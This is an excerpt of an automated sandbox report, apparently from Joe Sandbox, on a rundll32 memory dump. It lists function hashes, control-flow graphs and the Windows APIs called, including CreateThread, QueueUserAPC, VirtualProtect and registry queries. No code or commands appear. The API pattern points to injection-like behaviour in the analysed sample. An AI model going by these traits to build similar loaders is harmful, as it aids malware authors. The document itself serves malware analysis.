                                                                                                                                              • Opcode ID: 18d8ac82230bdfc4302373f1128c0f5960e1e63dc188b60f3db038388c3e2014
                                                                                                                                              • Instruction ID: 4ca5d6fdaeef408cdc8bdefd2db174dc2068897d4e0f5d1c3871f29c9e667e8b
                                                                                                                                              • Opcode Fuzzy Hash: 18d8ac82230bdfc4302373f1128c0f5960e1e63dc188b60f3db038388c3e2014
                                                                                                                                              • Instruction Fuzzy Hash: BD51B43060C606CBF7D0EF6899487AAB6E2EB98315F84813ED44AC36E1DF38C5058B53
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 504 27ff74d076c-27ff74d07a2 call 27ff74ea864 507 27ff74d07a8-27ff74d07cd RegQueryValueExA 504->507 508 27ff74d0839-27ff74d084d 504->508 509 27ff74d082e-27ff74d0833 RegCloseKey 507->509 510 27ff74d07cf-27ff74d07e7 507->510 509->508 512 27ff74d0829 510->512 513 27ff74d07e9-27ff74d080d 510->513 512->509 515 27ff74d0815-27ff74d0827 513->515 516 27ff74d080f-27ff74d0813 513->516 515->509 516->509
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCreateQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4083198587-0
                                                                                                                                              • Opcode ID: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
                                                                                                                                              • Instruction ID: 9a9db123bd0f805dda7f9c549edd3e7b59d16134701d29a2cced43e0f6db1a8d
                                                                                                                                              • Opcode Fuzzy Hash: 63f8bf2ffbde9439b19e476579ef08d7f0cd75ef32b6588a115372ae452a6d9a
                                                                                                                                              • Instruction Fuzzy Hash: 92212B3061CB088FE794EB28A849766B7D1FB98351F50452AE48DC32A1EB24D841CB93
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateOpen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 436179556-0
                                                                                                                                              • Opcode ID: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
                                                                                                                                              • Instruction ID: c56634f519ae64c664fe894f0a84d7e7ccb8ac111e0524f7750639427547ad76
                                                                                                                                              • Opcode Fuzzy Hash: 0fd58de01818f39c689c8671fe547acd9089d8ae02dcc106006c6a54173f430a
                                                                                                                                              • Instruction Fuzzy Hash: E9118E3060CA458FEB94EB5C9488B69F7E1FBA8310F50442EE88DC33A1DEA4C9418793
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 528 27ff74e10cc-27ff74e1108 CreateThread 529 27ff74e110a-27ff74e111b QueueUserAPC 528->529 530 27ff74e1143-27ff74e1155 528->530 529->530 531 27ff74e111d-27ff74e113b 529->531 531->530
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateQueueThreadUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3600083758-0
                                                                                                                                              • Opcode ID: c5f73e2456696368beb962f5df60b520ee6541a707c920c0f1f52e72b2ec33b6
                                                                                                                                              • Instruction ID: 2f8011e97cf6047e477ae929d96d56b002839b56e2c3cbfb3758da9cabe9fe79
                                                                                                                                              • Opcode Fuzzy Hash: c5f73e2456696368beb962f5df60b520ee6541a707c920c0f1f52e72b2ec33b6
                                                                                                                                              • Instruction Fuzzy Hash: 9B015631718A094FEB84EF2CA84D769B7E2E7AC711B048179E509C32A0DF34DC418B82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
                                                                                                                                              • Instruction ID: f4a32a5a9290eb7b417e7fa24f17c232cbd2a89b5fc1ae36a4a752734833ac0a
                                                                                                                                              • Opcode Fuzzy Hash: 6aa1d7655563690a4da4f05cca64eafe950653d6a721fc7ea7dd1fa497ac3de5
                                                                                                                                              • Instruction Fuzzy Hash: D961323061CA05DFE794EF18D989665B7E1FB6C301F90452EE48EC3691EF34E8418B96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 576 27ff74e1458-27ff74e1495 VirtualProtect 577 27ff74e14e7-27ff74e1502 576->577 578 27ff74e1497-27ff74e14b7 576->578 581 27ff74e14b9-27ff74e14c3 578->581 582 27ff74e14df 578->582 581->582 583 27ff74e14c5-27ff74e14dd 581->583 582->577 583->577
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                              • Opcode ID: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
                                                                                                                                              • Instruction ID: c25ff200c28c8535c2594d55b952fb1189f5b481d929cf85e00f60e253d50f8f
                                                                                                                                              • Opcode Fuzzy Hash: 4a765497a387f33308d21eb6f57c50523c4476f30fd5c9db11123bb1565e96cc
                                                                                                                                              • Instruction Fuzzy Hash: D0117F3124CA089FAB58EF59B8851A5B3E5EB9C316B40453DE94EC3295EA30ED05CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2711935003-0
                                                                                                                                              • Opcode ID: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
                                                                                                                                              • Instruction ID: e689902062e064e860d9611bc799578e72052fa22a673051b83e54419ebffa57
                                                                                                                                              • Opcode Fuzzy Hash: a38569a501b8e0ec64ed77100791f3d441e58a8fbacd49a898224bfc5fb91074
                                                                                                                                              • Instruction Fuzzy Hash: B3214F3051C7488FE795EB64D848BAAB7E1FB98305F90092AE48AC3691EF74D5458B43
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 609 27ff74ca92c-27ff74ca942 610 27ff74ca957-27ff74ca95a 609->610 611 27ff74ca944-27ff74ca955 609->611 612 27ff74ca95c-27ff74ca978 610->612 613 27ff74ca983-27ff74ca991 610->613 611->610 612->613 616 27ff74ca97a-27ff74ca97d FindCloseChangeNotification 612->616 616->613
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                              • Opcode ID: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
                                                                                                                                              • Instruction ID: 6a580c33d5f8dc9c922dcfb7dc5b61cdf46834bca70ac7136a8820988705949d
                                                                                                                                              • Opcode Fuzzy Hash: bfcf9b11c8a571321a20197ae80eed82d55b94b58a0f7e34586d0728a82784e3
                                                                                                                                              • Instruction Fuzzy Hash: 0EF0813431CB064BEB98DE58E489B2AB6D1EB98201F44592EB50AC3290CF74C8014B12
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000027.00000002.847104724.0000027FF74C1000.00000020.00000001.sdmp, Offset: 0000027FF74C1000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_39_2_27ff74c1000_rundll32.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcmp
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1534048567-0
                                                                                                                                              • Opcode ID: 1608627adbaccf2637d2de6840cab0dcfe8de2003ac308ffa53b0243ab2e23b6
                                                                                                                                              • Instruction ID: aa251996900ec53362df32e240522028c8b89c3e589872ca7376cfe8fb3fa11c
                                                                                                                                              • Opcode Fuzzy Hash: 1608627adbaccf2637d2de6840cab0dcfe8de2003ac308ffa53b0243ab2e23b6
                                                                                                                                              • Instruction Fuzzy Hash: A471953061CB45CFD799EF08C485A66B7E1FB98710F50462DE48E83695DB30E846C793
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Non-executed Functions